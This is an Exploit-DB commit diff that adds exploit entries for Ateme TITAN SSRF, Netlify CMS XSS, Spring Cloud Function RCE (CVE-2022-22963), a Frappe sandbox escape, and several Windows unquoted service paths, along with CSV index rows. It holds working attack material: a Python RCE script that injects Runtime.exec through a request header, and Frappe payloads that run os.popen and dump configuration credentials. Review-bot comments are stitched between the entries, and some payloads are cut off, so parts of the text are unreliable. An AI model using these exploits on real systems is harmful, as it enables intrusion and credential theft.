From 00f5021452890a2ed68ffb72bb4bddc175d969ab Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 12 Jul 2023 00:16:54 +0000 Subject: [PATCH] DB: 2023-07-12 10 changes to exploits/shellcodes/ghdb Ateme TITAN File 3.9 - SSRF File Enumeration Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Spring Cloud 3.2.2 - Remote Command Execution (RCE) BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) Park Ticketing Management System 1.0 - 'viewid' SQL Injection Park Ticketing Management System 1.0 - 'viewid' SQL Injection Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_ Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_ --- exploits/hardware/webapps/51582.txt | 71 +++++++++++++++++++++++++++++ exploits/java/webapps/51576.txt | 17 +++++++ exploits/java/webapps/51577.py | 23 ++++++++++ exploits/php/webapps/51581.txt | 16 +++++++ exploits/python/webapps/51580.txt | 47 +++++++++++++++++++ exploits/windows/local/51578.txt | 34 ++++++++++++++ exploits/windows/local/51579.txt | 34 ++++++++++++++ exploits/windows/local/51583.txt | 34 ++++++++++++++ exploits/windows/local/51584.txt | 38 +++++++++++++++ files_exploits.csv | 13 +++++- 10 files changed, 325 insertions(+), 2 deletions(-) create mode 100644 exploits/hardware/webapps/51582.txt create mode 100644 exploits/java/webapps/51576.txt create mode 100755 exploits/java/webapps/51577.py create mode 100644 exploits/php/webapps/51581.txt create mode 100644 exploits/python/webapps/51580.txt create mode 100644 exploits/windows/local/51578.txt create mode 100644 exploits/windows/local/51579.txt create mode 100644 exploits/windows/local/51583.txt create mode 100644 exploits/windows/local/51584.txt 
diff --git a/exploits/hardware/webapps/51582.txt b/exploits/hardware/webapps/51582.txt
new file mode 100644
index 000000000..d4075cf8a
--- /dev/null
+++ b/exploits/hardware/webapps/51582.txt
@@ -0,0 +1,71 @@ +#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration +#Exploit Author: LiquidWorm + + +Vendor: Ateme +Product web page: https://www.ateme.com +Affected version: 3.9.12.4 + 3.9.11.0 + 3.9.9.2 + 3.9.8.0 + +Summary: TITAN File is a multi-codec/format video transcoding +software, for mezzanine, STB and ABR VOD, PostProduction, Playout +and Archive applications. TITAN File is based on ATEME 5th Generation +STREAM compression engine and delivers the highest video quality +at minimum bitrates with accelerated parallel processing. + +Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability +exists in the Titan File video transcoding software. The application +parses user supplied data in the job callback url GET parameter. Since +no validation is carried out on the parameter, an attacker can specify +an external domain and force the application to make an HTTP/DNS/File +request to an arbitrary destination. This can be used by an external +attacker for example to bypass firewalls and initiate a service, file +and network enumeration on the internal network through the affected +application. + +Tested on: Microsoft Windows + NodeJS + Ateme KFE Software + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5781 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php + + +22.04.2023 + +-- + + +curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ + -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ + -H "User-Agent: sunee-mode" \ + "https://10.0.0.8/cmd?data=" + +Call to file://C:\\windows\\system.ini returned 0 + +--- + +HTTP from Server +---------------- + +POST / HTTP/1.1 +Host: ssrftest.zeroscience.mk +Accept: */* +Content-Type: application/xml +Content-Length: 192 + + + + 0000 + dummy test job + aborted + 50 + message + \ No newline at end of file 
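Review bot: The curl example in 51582.txt carries a literal `X-TITAN-WEB-TOKEN` value and a concrete host address; if either was captured from a live system it should be published as a placeholder, e.g. `-H "X-TITAN-WEB-TOKEN: <session-token>"`. The entry also ends at the proof and leaves operators nothing to act on, although the description already names the cause (the job callback URL is used without validation, and the sample output shows a `file://` target being accepted). A closing line such as `Mitigation: accept only http/https callback URLs to allowlisted destinations and restrict outbound connections from the transcoding host` would cover it.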
diff --git a/exploits/java/webapps/51576.txt b/exploits/java/webapps/51576.txt new file mode 100644 index 000000000..fa1ccf2dd --- /dev/null +++ b/exploits/java/webapps/51576.txt @@ -0,0 +1,17 @@ +# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) +# Exploit Author: tmrswrr +# Vendor Homepage: https://decapcms.org/docs/intro/ +# Software Link: https://github.com/decaporg/decap-cms +# Version: 2.10.192 +# Tested on: https://cms-demo.netlify.com + + +Description: + +1. Go to new post and write body field your payload: + +https://cms-demo.netlify.com/#/collections/posts + +Payload = + +2. After save it XSS payload will executed and see alert box \ No newline at end of file diff --git a/exploits/java/webapps/51577.py b/exploits/java/webapps/51577.py new file mode 100755 index 000000000..4ddde9f09 --- /dev/null +++ b/exploits/java/webapps/51577.py 
@@ -0,0 +1,23 @@ +# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE) +# Date: 07/07/2023 +# Exploit Author: GatoGamer1155, 0bfxgh0st +# Vendor Homepage: https://spring.io/projects/spring-cloud-function/ +# Description: Exploit to execute commands exploiting CVE-2022-22963 +# Software Link: https://spring.io/projects/spring-cloud-function +# CVE: CVE-2022-22963 + +import requests, argparse, json + +parser = argparse.ArgumentParser() +parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True) +parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True) +args = parser.parse_args() + +print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n") + +headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command } +data = {"data": ""} + +request = requests.post(args.url, data=data, headers=headers) +response = json.dumps(json.loads(request.text), indent=2) +print(response) \ No newline at end of file diff --git a/exploits/php/webapps/51581.txt b/exploits/php/webapps/51581.txt new file mode 100644 index 000000000..4d8e46059 --- /dev/null +++ b/exploits/php/webapps/51581.txt @@ -0,0 +1,16 @@ +# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: None +# Version: 5 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36163 + +#PoC: +An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like: +'>
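Review bot: The header of 51577.py titles the entry "Spring Cloud 3.2.2", while the vendor and software links and CVE-2022-22963 in the same header all refer to Spring Cloud Function, so the product is misnamed; `# Exploit Title: Spring Cloud Function 3.2.2 - Remote Command Execution (RCE)` would match (the same title is repeated in the files_exploits.csv row). The header also has no `# Version:` or `# Tested on:` line, so a reader cannot tell which releases were checked or where the fix landed; a pointer to the vendor advisory for the CVE would close that gap. For anyone triaging logs, the request is recognisable by the `spring.cloud.function.routing-expression` header it sets, and a one-line comment above `headers = ...` saying so would make the entry useful for detection as well.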
/tmp/pwned" +g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,)) +for x in g:0 +``` + +Context: +- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/ +- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6 +- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script +- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42 + +Bonus: + +More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`: + +```python3 +hax = """ +{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf} +""".strip() + +g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,)) +for x in g:0 +``` + +Which prints the Frappe config like database/redis credentials, etc. + +In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE. \ No newline at end of file diff --git a/exploits/windows/local/51578.txt b/exploits/windows/local/51578.txt new file mode 100644 index 000000000..d815cdfba --- /dev/null +++ b/exploits/windows/local/51578.txt 
@@ -0,0 +1,34 @@ +# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.minitool.com/ +# Software Link: https://www.minitool.com/download-center/ +# Version: 12.7 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36164 + +# PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto + +C:\Users>sc qc MTAgentService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MTAgentService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : MTAgentService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/51579.txt b/exploits/windows/local/51579.txt new file mode 100644 index 000000000..627dccfa0 --- /dev/null +++ b/exploits/windows/local/51579.txt 
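Review bot: The PoC in 51578.txt shows only that `BINARY_PATH_NAME` is unquoted and that the service runs as `LocalSystem`; it does not show that an unprivileged user can write to any of the parent directories of the path, which is the condition that decides whether the finding has impact. Recording the directory permissions (for example `icacls` output for the folders in the path) and the fix, which is to store the service path in quotes, would make the entry verifiable; the same applies to 51579.txt, 51583.txt and 51584.txt. The title also says "MiniTool Partition Wizard ShadowMaker" while the path in the output is `MiniTool ShadowMaker`, so the product name should be checked.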
@@ -0,0 +1,34 @@ +# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.minitool.com/ +# Software Link: https://www.minitool.com/download-center/ +# Version: 12.7 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36165 + +#PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto + +C:\Users>sc qc MTSchedulerService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MTSchedulerService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : MTSchedulerService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/51583.txt b/exploits/windows/local/51583.txt new file mode 100644 index 000000000..05a721942 --- /dev/null +++ b/exploits/windows/local/51583.txt 
@@ -0,0 +1,34 @@ +# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.avg.com +# Software Link: https://www.avg.com/en-ww/homepage#pc +# Version: 7.5 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36167 + +#PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto + +C:\Users>sc qc "AVG Anti-Spyware Guard" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: AVG Anti-Spyware Guard + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AVG Anti-Spyware Guard + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/local/51584.txt b/exploits/windows/local/51584.txt new file mode 100644 index 000000000..71a74c475 --- /dev/null +++ b/exploits/windows/local/51584.txt 
@@ -0,0 +1,38 @@ +# Exploit Title: Game Jackal Server v5 - Unquoted Service Path +# Date: 06/07/2023 +# Exploit Author: Idan Malihi +# Vendor Homepage: https://www.allradiosoft.ru +# Software Link: https://www.allradiosoft.ru/en/ss/index.htm +# Version: 5 +# Tested on: Microsoft Windows 10 Pro +# CVE : CVE-2023-36166 + +#PoC + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i +auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ +Game Jackal Server v5 + GJServiceV5 C:\Program Files +(x86)\SlySoft\Game Jackal v5\Server.exe Auto + +C:\Users>sc qc GJServiceV5 +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: GJServiceV5 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal +v5\Server.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Game Jackal Server v5 + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users>systeminfo + +Host Name: DESKTOP-LA7J17P +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19042 N/A Build 19042 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 999d044cb..dbeb5d010 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -4043,6 +4043,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41572,exploits/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",webapps,hardware,,2017-03-10,2017-03-10,0,CVE-2017-6549,,,,,https://bierbaumer.net/security/asuswrt/
 44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80,2018-06-25,2018-06-25,0,,"Cross-Site Request Forgery (CSRF)",,,,
 39962,exploits/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,webapps,hardware,80,2016-06-16,2016-06-16,0,,,,,,
+51582,exploits/hardware/webapps/51582.txt,"Ateme TITAN File 3.9 - SSRF File Enumeration",2023-07-11,LiquidWorm,webapps,hardware,,2023-07-11,2023-07-11,0,,,,,,
 49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,,2020-11-30,2020-11-30,0,,,,,,
 46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,,2019-05-22,2019-05-29,0,CVE-2019-11368,,,,,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,,2019-06-03,2019-06-03,0,,,,,,
@@ -5526,6 +5527,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info
 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info
 51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,,
+51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-11,0,,,,,,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,,
 26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info
 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info
@@ -5577,6 +5579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz,
 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,,
 33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info
+51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,,
 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,,
 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,,
 50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",2022-03-07,"Carlos E. Vieira",webapps,java,,2022-03-07,2022-03-07,0,CVE-2022-22947,,,,,
@@ -15104,6 +15107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4103,exploits/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,webapps,php,,2007-06-24,,1,OSVDB-40152;CVE-2007-3448;OSVDB-38223;CVE-2007-3447;OSVDB-38205;CVE-2007-3446,,,,,http://www.h4cky0u.org/viewtopic.php?t=26834
 15509,exploits/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",webapps,php,,2010-11-13,2010-11-13,0,,,,,,
 3947,exploits/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",webapps,php,,2007-05-16,,1,OSVDB-37955;CVE-2007-2762;OSVDB-37954;OSVDB-37953;OSVDB-37952;OSVDB-37951;OSVDB-37950;OSVDB-37949,,,,,
+51581,exploits/php/webapps/51581.txt,"BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)",2023-07-11,"Idan Malihi",webapps,php,,2023-07-11,2023-07-11,0,CVE-2023-36163,,,,,
 40390,exploits/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,webapps,php,80,2016-09-19,2016-09-26,1,,,,,http://www.exploit-db.comBuilderEngine-CMS-V3.zip,
 29697,exploits/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33821,,,,,https://www.securityfocus.com/bid/22783/info
 29698,exploits/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33822,,,,,https://www.securityfocus.com/bid/22783/info
@@ -25469,9 +25473,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41730,exploits/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php,,2017-03-26,2017-03-27,0,,,,,, 7851,exploits/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,webapps,php,,2009-01-21,2017-01-23,1,OSVDB-51642;CVE-2009-0279,,,,http://www.exploit-db.compardalcms-0.2.0.tar.bz2, 2955,exploits/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,webapps,php,,2006-12-18,2016-09-21,1,OSVDB-35709;CVE-2006-6739,,,,http://www.exploit-db.comparistemi-0_8_3.zip, -48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,, +48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2023-07-11,1,,,,,, 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,, -49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,, +49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2023-07-11,1,,,,,, 12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php,,2010-05-26,,1,,,,,, 17231,exploits/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,webapps,php,,2011-05-02,2011-05-02,1,,,,,, 45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection 
(SQLi)",,,http://www.exploit-db.compar6lus_11_20160225.exe, @@ -34562,6 +34566,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/ 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, +51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,, 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,, 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz, 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,, 
@@ -39409,6 +39414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 839,exploits/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",local,windows,,2005-02-23,,1,OSVDB-14206;CVE-2005-0506,,,,,
 17877,exploits/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,local,windows,,2011-09-20,2011-09-24,1,OSVDB-84578,,,http://www.exploit-db.com/screenshots/idlt18000/17877.png,http://www.exploit-db.comavcon.exe,
 12528,exploits/windows/local/12528.pl,"AVCON H323Call - Local Buffer Overflow",2010-05-07,"Dillon Beresford",local,windows,,2010-05-06,2011-03-03,1,,,,,http://www.exploit-db.comavcon.exe,
+51583,exploits/windows/local/51583.txt,"AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36167,,,,,
 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows,,2015-02-04,2015-02-04,0,CVE-2014-9632;OSVDB-113824,,,,,
 18109,exploits/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,local,windows,,2011-11-13,2011-11-13,1,OSVDB-77043,"Metasploit Framework (MSF)",,,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
 22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows,,2012-11-26,2017-08-17,1,OSVDB-77043,,,http://www.exploit-db.com/screenshots/idlt23000/screen-shot-2012-11-26-at-120023-pm.png,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
@@ -39988,6 +39994,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10339,exploits/windows/local/10339.pl,"gAlan 0.2.1 - Local Buffer Overflow (1)",2009-12-07,"Jeremy Brown",local,windows,,2009-12-06,,1,OSVDB-60897,,,,http://www.exploit-db.comgalan-0.2.1-win32.zip,
 16664,exploits/windows/local/16664.rb,"gAlan 0.2.1 - Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows,,2010-09-25,2011-03-10,1,OSVDB-60897,"Metasploit Framework (MSF)",,,,
 10346,exploits/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,local,windows,,2009-12-06,,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgalan-0.2.1-win32.zip,
+51584,exploits/windows/local/51584.txt,"Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36166,,,,,
 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,,2016-07-07,2016-07-07,0,,,,,,
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
@@ -40815,6 +40822,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
